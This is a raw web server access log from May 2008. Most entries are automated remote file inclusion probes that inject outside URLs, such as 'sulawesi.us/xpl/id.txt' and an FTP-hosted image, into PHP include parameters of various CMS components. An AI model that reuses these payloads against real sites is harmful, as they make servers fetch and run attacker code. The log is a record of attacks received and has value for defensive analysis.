202.28.68.88 - - [03/May/2008:09:44:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.254.37.143 - - [03/May/2008:09:44:17 -0700] "GET /logs/access_080321.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.37.143 - - [03/May/2008:09:44:17 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.37.143 - - [03/May/2008:09:44:17 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:25 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:25 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:25 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:44 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:45 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:45 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:48 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:48 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:48 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:48 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:49 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:49 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.28 - - [03/May/2008:09:45:19 -0700] "GET /logs/access_080420.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:45:27 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:45:27 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:45:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:45:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:45:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:45:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:45:30 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:45:30 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:45:31 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:45:40 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:45:41 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:45:46 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:09:46:02 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:09:46:02 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:46:31 -0700] "GET /logs/access_080302.log/trans.php?trans=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:46:32 -0700] "GET /trans.php?trans=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:46:32 -0700] "GET /logs/trans.php?trans=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:09:47:00 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.4boarders.sk/eshop/media/57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:47:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:47:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:48:04 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:48:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:48:08 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:48:08 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:48:08 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:09:48:31 -0700] "GET /logs//protection.php?action=logout&siteurl=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:09:48:31 -0700] "GET //protection.php?action=logout&siteurl=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:09:48:39 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:09:48:39 -0700] "GET //protection.php?action=logout&siteurl=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:09:48:39 -0700] "GET /logs//protection.php?action=logout&siteurl=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:48:41 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:48:42 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:48:43 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:09:48:46 -0700] "GET /logs/access_071031.log//protection.php?action=logout&siteurl=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:48:51 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:48:52 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:48:53 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [03/May/2008:09:49:02 -0700] "GET /logs/access_080207.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [03/May/2008:09:49:02 -0700] "GET /@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [03/May/2008:09:49:02 -0700] "GET /logs/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:09:49:03 -0700] "GET /index.php?include=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [03/May/2008:09:49:04 -0700] "GET /logs/access_080205.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [03/May/2008:09:49:18 -0700] "GET /logs/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [03/May/2008:09:49:18 -0700] "GET /@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:49:53 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:49:56 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:49:59 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:49:59 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:50:39 -0700] "GET /logs/access_080228.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:50:39 -0700] "GET /@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:50:40 -0700] "GET /logs/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:09:50:46 -0700] "GET /pagina.php?basepath=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:50:49 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:09:50:51 -0700] "GET /logs/index.php?redir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:50:52 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:09:50:53 -0700] "GET /index.php?redir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:50:53 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:50:53 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:09:50:54 -0700] "GET /pagina.php?basepath=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:51:00 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:51:01 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:51:02 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.115 - - [03/May/2008:09:51:36 -0700] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:51:53 -0700] "GET /logs/access.log/index.php?configFile=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:52:21 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:52:22 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:52:25 -0700] "GET /logs/access_080213.log/index.php?configFile=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:52:31 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:52:32 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.164 - - [03/May/2008:09:53:03 -0700] "GET /pagina.php?basepath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:53:35 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:09:53:39 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:09:53:40 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:09:53:46 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.36 - - [03/May/2008:09:53:50 -0700] "GET /logs/access_080215.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://gemblog.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:53:50 -0700] "GET /logs/access_080122.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.134.252.194 - - [03/May/2008:09:53:59 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.227 - - [03/May/2008:09:54:23 -0700] "GET /logs/access.log/index.php?body=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.227 - - [03/May/2008:09:54:25 -0700] "GET /index.php?body=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.227 - - [03/May/2008:09:54:26 -0700] "GET /logs/index.php?body=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [03/May/2008:09:54:49 -0700] "GET /logs/access_071212.log/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [03/May/2008:09:54:50 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [03/May/2008:09:54:50 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.254.37.143 - - [03/May/2008:09:55:01 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.37.143 - - [03/May/2008:09:55:02 -0700] "GET //index.php?option=com_custompages&cpage=http://www.directresa.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.37.143 - - [03/May/2008:09:55:02 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.93.56.80 - - [03/May/2008:09:55:07 -0700] "GET /logs/access_071228.log/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.227 - - [03/May/2008:09:55:29 -0700] "GET /logs/access_080223.log/index.php?body=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:09:56:31 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:09:56:31 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:09:56:31 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:09:56:32 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:09:56:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:09:56:41 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:09:56:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:09:56:44 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:56:50 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.56.80 - - [03/May/2008:09:56:55 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:09:57:42 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
